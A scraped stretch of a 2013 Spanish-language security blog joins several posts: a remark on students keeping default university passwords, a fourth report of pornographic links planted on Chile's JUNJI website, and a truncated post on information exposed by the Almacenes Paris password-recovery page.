<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: large;"><i>Malas Prácticas..</i>?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Es curioso darse cuenta que la mayoría de los alumnos no cambian su clave por default, muchos nisiquiera imaginan las cosas que se podrían lograr accediendo. ( no extrapolan el peligro ).</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Mas curioso aún, a finales de cada año ciertas universidades realizan un Reseteo de las claves, por lo que cada año comienzas con tu misma clave por default. / y en el olvido queda tu clave actualizada que hayas cambiado previamente.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Fin~#</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-53371362340950792482013-04-15T06:03:00.001-07:002013-04-15T06:03:35.131-07:00[4ta vez] Pagina de la JUNJI con links Pornos <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHI-v-L2LbOMFlgEyAjX4Kew7KzBGxxxoPYE1yJOgns24Lu-yqs-IYYPqSFn64T5BAifPohAoJHM1Y1UQRbvotMvhoZWp42QGbfz-k2IXdPQ7Vi4AWdiXWY7VEQ1NAIANR4Pnep3CpOzuJ/s1600/junji.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHI-v-L2LbOMFlgEyAjX4Kew7KzBGxxxoPYE1yJOgns24Lu-yqs-IYYPqSFn64T5BAifPohAoJHM1Y1UQRbvotMvhoZWp42QGbfz-k2IXdPQ7Vi4AWdiXWY7VEQ1NAIANR4Pnep3CpOzuJ/s1600/junji.jpg" /></a></div>
<br />
<br />
<span style="background-color: black; font-family: Courier New, Courier, monospace;">Lo que sucede con el sitio de la JUNJI parece un cuento de nunca acabar, ya lo advertimos antes:</span><br />
<span style="background-color: black; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: black; font-family: Courier New, Courier, monospace;"><b style="font-size: 13px; line-height: 18px;">Primera denuncia:(octubre-2012)</b><span style="font-size: 13px; line-height: 18px;"> </span><a href="http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html">http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html</a></span><br />
<span style="background-color: black; font-family: Courier New, Courier, monospace;"><b style="font-size: 13px; line-height: 18px;">Segunda denuncia:(diciembre 2012)</b><span style="font-size: 13px; line-height: 18px;"> </span><a href="http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/">http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/</a></span><br />
<span style="background-color: black; font-family: Courier New, Courier, monospace;">Tercera denuncia: ( Enero-2013) <a href="http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html">http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html</a></span><br />
<br />
<span style="background-color: black; font-family: Courier New, Courier, monospace;">Ahora por Cuarta vez: ( Abril-2013) nuevamente a la luz:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiasvbH9UVWhpaHu_c6Eo8QtVw0iqk9FDYRMzGBWsXe1ncfZ0za3762vzLaLM4UdXTUrLHddXnpDH8jxRnPnPXE8V8BsQF_9Uap86vkV29iECJ5tMHuMjNRUqqfO55oOYYYvinygtZVsoku/s1600/porno.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiasvbH9UVWhpaHu_c6Eo8QtVw0iqk9FDYRMzGBWsXe1ncfZ0za3762vzLaLM4UdXTUrLHddXnpDH8jxRnPnPXE8V8BsQF_9Uap86vkV29iECJ5tMHuMjNRUqqfO55oOYYYvinygtZVsoku/s1600/porno.png" height="97" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Courier New, Courier, monospace;">Al parecer el encargado del sitio solo se limita a eliminar los links porno, y no a solucionar el verdadero problema.</span><br />
<br />
//shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com1tag:blogger.com,1999:blog-7067370504470948159.post-2923682829454415672013-02-14T16:50:00.001-08:002013-04-15T06:28:07.221-07:00Informacion Expuesta ? - Sitio Almacenes Paris <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_nZ-khUN7zHwTiluJwj-ekY_0joAAggALDN3QkbPhxKAOoliCBhsi-Tq6BJuYGMqy90u7opg8cE7ByNdLXYtWq_oMJOpEgvXKMTHg13nWFXUWImXZSheSwcIC4_-JgAf4vE0OFpRtr-l/s1600/paris.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_nZ-khUN7zHwTiluJwj-ekY_0joAAggALDN3QkbPhxKAOoliCBhsi-Tq6BJuYGMqy90u7opg8cE7ByNdLXYtWq_oMJOpEgvXKMTHg13nWFXUWImXZSheSwcIC4_-JgAf4vE0OFpRtr-l/s1600/paris.png" height="200" width="194"></a></div>
<span style="font-family: Courier New, Courier, monospace;">Lo que para algunos resulta ser algo muy común o una característica para otros resulta ser una situación de información expuesta demás. Es común ver distintas maneras de recuperar una contraseña perdida. Preguntas secretas, envío al correo de un link para restablecer contraseña y otros.</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;">La verdad el otro día me encontraba en la pagina de la Multitienda París intentando comprar algunos productos y había olvidado la contraseña, si #Genius . Por lo que fui a "¿Olvidaste tu clave? y comenzó la historia.</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;">Al momento de dirigirnos a este sitio, observamos que en primero lugar nos pide el rut.</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNCvMybAIlcnGJUfQjISSMnwxP6o2A9Ht-hTGV0BZD1Obzr-ndysb-bDU41Q4KLKq2DpHvQuShhw7V6_0665djR5gcNoXDvP7xwol1-FrdsdM69hS_-WE6UbGjHgTPkQS6sV3b_xRB6ZfX/s1600/paris1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNCvMybAIlcnGJUfQjISSMnwxP6o2A9Ht-hTGV0BZD1Obzr-ndysb-bDU41Q4KLKq2DpHvQuShhw7V6_0665djR5gcNoXDvP7xwol1-FrdsdM69hS_-WE6UbGjHgTPkQS6sV3b_xRB6ZfX/s1600/paris1.png" height="250" width="640"></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"></span><br>
<a href="http://xshinee.blogspot.com/2013/02/informacion-expuesta-sitio-almacenes.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0